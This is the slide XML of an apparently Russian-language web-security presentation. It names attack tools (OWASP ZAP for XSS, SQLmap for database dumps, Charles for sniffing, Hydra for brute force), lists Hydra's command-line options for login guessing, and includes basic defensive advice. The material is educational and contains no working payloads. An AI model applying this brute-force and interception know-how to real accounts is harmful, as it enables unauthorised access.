        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030576" y="1042875"/>
            <a:ext cx="7398480" cy="3912900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Shape 474"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030575" y="1985325"/>
            <a:ext cx="1420200" cy="134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5" name="Shape 475"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563975" y="2442525"/>
            <a:ext cx="1420200" cy="19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descr="2.JPG" id="85" name="Shape 85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 86"/>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Сегодня в программе:</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88" name="Shape 88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565325" y="1205825"/>
            <a:ext cx="7970100" cy="4161000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000"/>
              <a:t>XSS  -&gt;  OWASP ZAP</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000"/>
              <a:t>Дамп базы данных -&gt; SQLmap</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000"/>
              <a:t>Сниффинг  -&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3000"/>
              <a:t>Charles</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000"/>
              <a:t>Подбор данных (Brute force) -&gt;  Hydra</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="480" name="Shape 480"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Shape 48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482" name="Shape 482"/>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3" name="Shape 48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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Charles</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id="484" name="Shape 484"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1486525" y="993425"/>
            <a:ext cx="6502026" cy="4079425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4157125" y="1622950"/>
            <a:ext cx="454500" cy="19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6" name="Shape 486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3702625" y="2411200"/>
            <a:ext cx="1900200" cy="252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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="491" name="Shape 491"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Как пользоваться Charlse для перехвата данных" id="492" name="Shape 492" title="Charlse">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113375" y="87275"/>
            <a:ext cx="6641675" cy="4981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2.JPG" id="497" name="Shape 497"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Shape 498"/>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499" name="Shape 499"/>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Shape 500"/>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Как защитится?</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sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Shape 501"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981500" y="1763400"/>
            <a:ext cx="7690500" cy="2335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ru" sz="2200"/>
              <a:t>1. Не позволяйте посторонним лицам иметь доступ в вашу сеть. </a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2200"/>
              <a:t>2. Когда вы сами пользуетесь публичными точками доступа, то, хотя бы, помните об угрозе перехвата пароля. </a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>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0" st="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1" st="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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2" st="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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3" st="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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4" st="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="506" name="Shape 506"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Shape 50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508" name="Shape 508"/>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9" name="Shape 50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Brute force -&gt; Hydra</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descr="images-e1439832355215.jpg" id="510" name="Shape 510"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2869100" y="3366850"/>
            <a:ext cx="3733825" cy="1642875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="1daDgwIgKJU.jpg" id="511" name="Shape 511"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1334700"/>
            <a:ext cx="2292900" cy="1719675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="1daDgwIgKJU.jpg" id="512" name="Shape 512"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6583300" y="1472600"/>
            <a:ext cx="2292900" cy="1719675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="Shape 513"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729075" y="929450"/>
            <a:ext cx="1881600" cy="298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email or username</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Shape 514"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7129875" y="929450"/>
            <a:ext cx="1881600" cy="298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Password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="515" name="Shape 515"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455325" y="2707450"/>
            <a:ext cx="2022600" cy="884400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="516" name="Shape 516"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4929525" y="2669825"/>
            <a:ext cx="1843800" cy="9030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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="521" name="Shape 521"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Shape 52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523" name="Shape 523"/>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4" name="Shape 52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Как защитится?</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descr="xhydra.png" id="525" name="Shape 525"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="855450" y="1189100"/>
            <a:ext cx="3007025" cy="3007025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Shape 526"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429325" y="1425225"/>
            <a:ext cx="4518900" cy="2031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ru" sz="2400"/>
              <a:t>Hydra - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>Утилита для подбора аутентификационных данных методом грубой силы (brute force).</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="531" name="Shape 531"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Shape 532"/>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533" name="Shape 533"/>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4" name="Shape 53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Работа с Hydra</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sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Shape 535"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="901025"/>
            <a:ext cx="8260800" cy="4235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lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Восстановить предыдущую прерванную сессию</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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ПОРТ</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l -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ЛОГИН</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p -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ПАРОЛЬ</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x - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Генерация паролей для брутфорса, наберите "-x -h" для помощи</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o -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ФАЙЛ</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f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Выйти, когда пара логин/пароль подобрана </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t - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ЗАДАЧИ</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ВРЕМЯ</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="222222"/>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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1" st="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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2" st="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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3" st="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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4" st="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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5" st="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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6" st="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53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7" st="7"/>
